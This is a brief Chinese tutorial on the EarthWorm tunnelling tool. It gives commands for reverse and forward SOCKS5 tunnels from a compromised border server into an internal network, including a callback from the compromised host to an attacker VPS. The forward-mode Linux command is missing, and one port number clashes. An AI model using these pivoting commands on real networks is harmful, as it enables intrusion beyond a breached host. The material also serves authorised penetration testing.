EarthWorm
EarthWorm(ew)是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,可在复杂网络环境下完成网络穿透。工具包中提供了多种可执行文件,以适用Linux、Windows、MacOS、Arm-Linux 等不同的操作系统。
项目地址:GitHub - idlefire/ew: 内网穿透(跨平台)
ps:速度相较于nps、frp还是差很多
目标出网(反向代理)
目标出网时,使用反向代理,服务端开启监听,等待客户端的连接。
服务端vps开启监听7500端口,等待客户端连接7500
- 服务端开启监听7500,并设置使用代理的端口为7777
./ew_for_linux64 -s rcsocks -l 7777 -e 7500
- 启动客户端
被拿下的网络边界服务器为客户端,主动连接7500端口
#windows中 ew_for_Win.exe -s rssocks -d 172.16.2.2 -e 7500 #linux中 ./ew_for_linux64 -s rssocks -d 172.16.2.2 -e 7500
这样隧道就搭建成功了,然后我们本地使用Proxifier去连接7777端口,连接socks5隧道
这样就可以直通内网了
目标不出网(正向代理)
正向代理就是⽬标客户端监听,攻击方主动连接客户端,这就叫做正向代理。因为是攻击方主动连接目标,所以不需要额外的vps。而反向代理因为是目标主动连接我们,我们由于处于内网其无法直接连接,所以需要vps。使⽤正向代理⽬标⽹络边界的机器防⽕墙需要关闭才可以连接
⾸先⽬标客户端执行:
#windows ew_for_Win.exe -s ssocksd -l 8000 #linux ````
监听80端口
然后使⽤ Proxifier ⼯具直接与⽬标客户端建立socks5隧道
访问内网web服务
